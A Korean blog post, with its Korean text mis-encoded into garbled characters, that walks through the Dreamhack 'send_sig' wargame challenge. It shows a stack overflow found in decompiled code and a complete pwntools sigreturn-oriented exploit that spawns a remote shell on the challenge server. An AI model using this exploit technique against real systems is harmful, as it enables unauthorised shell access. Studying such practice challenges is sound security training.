article thumbnail image
Published 2022. 11. 14. 22:30

[Dreamhack System Hacking] send_sig

DreamHack/SystemHacking

send_sig

 

 

Code

start ํ•จ์ˆ˜

void __noreturn start()
{
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  write(1, "++++++++++++++++++Welcome to dreamhack++++++++++++++++++\n", 0x39uLL);
  write(1, "+ You can send a signal to dreamhack server.           +\n", 0x39uLL);
  write(1, "++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n", 0x39uLL);
  sub_4010B6();
  exit(0);
}

sub_4010B6 ํ•จ์ˆ˜๋ฅผ ํ˜ธ์ถœํ•˜๋Š” ๊ฑธ ํ™•์ธํ•  ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ์ด๋ฅผ ๋ถ„์„ํ•ด๋ณด๊ณ ์ž ํ•œ๋‹ค.

 

sub_4010B6 ํ•จ์ˆ˜

ssize_t sub_4010B6()
{
  char buf[8]; // [rsp+8h] [rbp-8h] BYREF

  write(1, "Signal:", 7uLL);
  return read(0, buf, 0x400uLL);
}

๋‹ค์Œ ํ•จ์ˆ˜๋ฅผ ๋ณด๋ฉด, buf์˜ ํฌ๊ธฐ๋Š” 8์ธ๋ฐ, read ํ•จ์ˆ˜๋ฅผ ํ†ตํ•ด 0x400๋งŒํผ ์ฝ์–ด๋“ค์ด๊ธฐ ๋•Œ๋ฌธ์— ์Šคํƒ ๋ฒ„ํผ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ๊ฐ€ ๋ฐœ์ƒํ•œ๋‹ค.

 

sub_401090 ํ•จ์ˆ˜

const char *sub_401090()
{
  return "/bin/sh";
}

 

 

์ต์Šคํ”Œ๋กœ์ž‡ ์ฝ”๋“œ

from pwn import *

context.arch = "x86_64"
p = remote("host3.dreamhack.games", 13589)
e = ELF("./send_sig")
r = ROP(e)

pop_rax = r.find_gadget(['pop rax', 'ret'])[0]
syscall = r.find_gadget(['syscall'])[0]
binsh = 0x402000

frame = SigreturnFrame()

# execve("/bin/sh", 0, 0)
frame.rax = 0x3b
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall

payload = b"A" * 16
payload += p64(pop_rax)
payload += p64(15)
payload += p64(syscall)
payload += bytes(frame)

p.sendlineafter("Signal:", payload)
p.interactive()

 

'DreamHack > SystemHacking' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Dreamhack System Hacking] _IO_FILE  (0) 2022.11.18
[Dreamhack System Hacking] SigReturn-Oriented Programming  (0) 2022.11.14
[Dreamhack System Hacking] SROP  (0) 2022.11.14
[DreamHack System Hacking] rtld  (0) 2022.09.22
[DreamHack System Hacking] __eviron  (0) 2022.09.21
๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค!

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”